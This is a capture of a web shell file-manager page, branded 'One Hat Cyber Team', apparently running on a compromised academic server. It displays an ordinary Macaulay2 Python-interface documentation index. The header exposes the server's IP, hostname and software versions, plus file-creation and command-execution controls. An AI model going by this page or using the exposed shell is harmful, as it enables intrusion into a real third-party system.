One Hat Cyber Team
Your IP :
216.73.216.216
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
Macaulay2
/
Python
/
html
/
View File Name :
toc.html
<!DOCTYPE html> <html lang="en"> <head> <title>Python : Table of Contents</title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <link type="text/css" rel="stylesheet" href="../../../../Macaulay2/Style/doc.css"> <link rel="stylesheet" href="../../../../Macaulay2/Style/katex/katex.min.css"> <script defer="defer" src="../../../../Macaulay2/Style/katex/katex.min.js"></script> <script defer="defer" src="../../../../Macaulay2/Style/katex/contrib/auto-render.min.js"></script> <script> var macros = { "\\break": "\\\\", "\\ZZ": "\\mathbb{Z}", "\\NN": "\\mathbb{N}", "\\QQ": "\\mathbb{Q}", "\\RR": "\\mathbb{R}", "\\CC": "\\mathbb{C}", "\\PP": "\\mathbb{P}" }, delimiters = [ { left: "$$", right: "$$", display: true}, { left: "\\[", right: "\\]", display: true}, { left: "$", right: "$", display: false}, { left: "\\(", right: "\\)", display: false} ], ignoredTags = [ "kbd", "var", "samp", "script", "noscript", "style", "textarea", "pre", "code", "option" ]; document.addEventListener("DOMContentLoaded", function() { renderMathInElement(document.body, { delimiters: delimiters, macros: macros, ignoredTags: ignoredTags, trust: true }); }); </script> <style>.katex { font-size: 1em; }</style> <script defer="defer" src="../../../../Macaulay2/Style/katex/contrib/copy-tex.min.js"></script> <script defer="defer" src="../../../../Macaulay2/Style/katex/contrib/render-a11y-string.min.js"></script> <script src="../../../../Macaulay2/Style/prism.js"></script> <script>var current_version = '1.25.06';</script> <script src="../../../../Macaulay2/Style/version-select.js"></script> <link type="image/x-icon" rel="icon" href="../../../../Macaulay2/Style/icon.gif"> </head> <body> <div id="buttons"> <div> <a href="https://macaulay2.com/">Macaulay2</a> <span id="version-select-container"></span> » <a title="Macaulay2 documentation" href="../../Macaulay2Doc/html/index.html">Documentation </a> <br><a href="../../Macaulay2Doc/html/_packages_spprovided_spwith_sp__Macaulay2.html">Packages</a> » <span><a title="interface to Python" href="index.html">Python</a> :: <a href="toc.html">Table of Contents</a></span> </div> <div class="right"> <form method="get" action="https://www.google.com/search"> <input placeholder="Search" type="text" name="q" value=""> <input type="hidden" name="q" value="site:macaulay2.com/doc"> </form> next | previous | forward | backward | up | <a href="master.html">index</a> | <a href="toc.html">toc</a> </div> </div> <hr> <h1>Python : Table of Contents</h1> <ul> <li><span><a title="interface to Python" href="index.html">Python</a> -- interface to Python</span></li> <li><span><a title="absolute value of a python object" href="_abs_lp__Python__Object_rp.html">abs(PythonObject)</a> -- absolute value of a python object</span></li> <li><span><a title="convenience function for adding value hooks" href="_add__Py__To__M2__Function.html">addPyToM2Function</a> -- convenience function for adding value hooks</span></li> <li><span><a title="ceiling of a python object" href="_ceiling_lp__Python__Object_rp.html">ceiling(PythonObject)</a> -- ceiling of a python object</span></li> <li><span><span class="tt">context</span> (missing documentation)<!--tag: context--> </span></li> <li><span><span class="tt">dict</span> (missing documentation)<!--tag: dict--> </span></li> <li><span><span class="tt">eval</span> (missing documentation)<!--tag: eval--> </span></li> <li><span><span class="tt">expr</span> (missing documentation)<!--tag: expr--> </span></li> <li><span><a title="floor of a python object" href="_floor_lp__Python__Object_rp.html">floor(PythonObject)</a> -- floor of a python object</span></li> <li><span><a title="get an attribute of a python object" href="_getattr.html">getattr</a> -- get an attribute of a python object</span></li> <li><span><a title="get elements of python sequences" href="_getitem.html">getitem</a> -- get elements of python sequences</span></li> <li><span><a title="whether a python object has an attribute" href="_hasattr.html">hasattr</a> -- whether a python object has an attribute</span></li> <li><span><a title="documentation for python object" href="_help_lp__Python__Object_rp.html">help(PythonObject)</a> -- documentation for python object</span></li> <li><span><a title="import a Python module" href="_import.html">import</a> -- import a Python module</span></li> <li><span><a title="test membership in a python object" href="_is__Member_lp__Thing_cm__Python__Object_rp.html">isMember(Thing,PythonObject)</a> -- test membership in a python object</span></li> <li><span><a title="get iterator of iterable python object" href="_iterator_lp__Python__Object_rp.html">iterator(PythonObject)</a> -- get iterator of iterable python object</span></li> <li><span><a title="returns the length of a python object" href="_length_lp__Python__Object_rp.html">length(PythonObject)</a> -- returns the length of a python object</span></li> <li><span><a title="retrieve the next item from a python iterator" href="_next_lp__Python__Object_rp.html">next(PythonObject)</a> -- retrieve the next item from a python iterator</span></li> <li><span><a title="type of a python object" href="_object__Type.html">objectType</a> -- type of a python object</span></li> <li><span><span class="tt">Preprocessor</span> (missing documentation)<!--tag: Preprocessor--> </span></li> <li><span><span class="tt">pythonHelp</span> (missing documentation)<!--tag: pythonHelp--> </span></li> <li><span><a title="a python object" href="___Python__Object.html">PythonObject</a> -- a python object</span></li> <li><span><a title="bitwise not of a python object" href="___Python__Object_sp~.html">PythonObject ~</a> -- bitwise not of a python object</span></li> <li><span><a title="execute Python source code from a string" href="_python__Value.html">pythonValue</a> -- execute Python source code from a string</span></li> <li><span><a title="quotient and remainder of python objects" href="_quotient__Remainder_lp__Python__Object_cm__Python__Object_rp.html">quotientRemainder(PythonObject,PythonObject)</a> -- quotient and remainder of python objects</span></li> <li><span><a title="round a python object" href="_round_lp__Z__Z_cm__Python__Object_rp.html">round(ZZ,PythonObject)</a> -- round a python object</span></li> <li><span><a title="execute Python source code from a string in __main__" href="_run__Simple__String.html">runSimpleString</a> -- execute Python source code from a string in __main__</span></li> <li><span><a title="set an attribute of a python object" href="_setattr.html">setattr</a> -- set an attribute of a python object</span></li> <li><span><a title="set elements of mutable python sequences" href="_setitem.html">setitem</a> -- set elements of mutable python sequences</span></li> <li><span><span class="tt">stmt</span> (missing documentation)<!--tag: stmt--> </span></li> <li><span><span class="tt">stmtexpr</span> (missing documentation)<!--tag: stmtexpr--> </span></li> <li><span><span class="tt">symbols</span> (missing documentation)<!--tag: symbols--> </span></li> <li><span><a title="convert callable python objects to Macaulay2 functions" href="_to__Function.html">toFunction</a> -- convert callable python objects to Macaulay2 functions</span></li> <li><span><a title="convert Macaulay2 things to Python objects" href="_to__Python.html">toPython</a> -- convert Macaulay2 things to Python objects</span></li> <li><span><a title="truncate a python object" href="_truncate_lp__Python__Object_rp.html">truncate(PythonObject)</a> -- truncate a python object</span></li> <li><span><span class="tt">val</span> (missing documentation)<!--tag: val--> </span></li> <li><span><a title="convert python objects to Macaulay2 things" href="_value_lp__Python__Object_rp.html">value(PythonObject)</a> -- convert python objects to Macaulay2 things</span></li> <li><span><span class="tt">valuestring</span> (missing documentation)<!--tag: valuestring--> </span></li> </ul> </body> </html>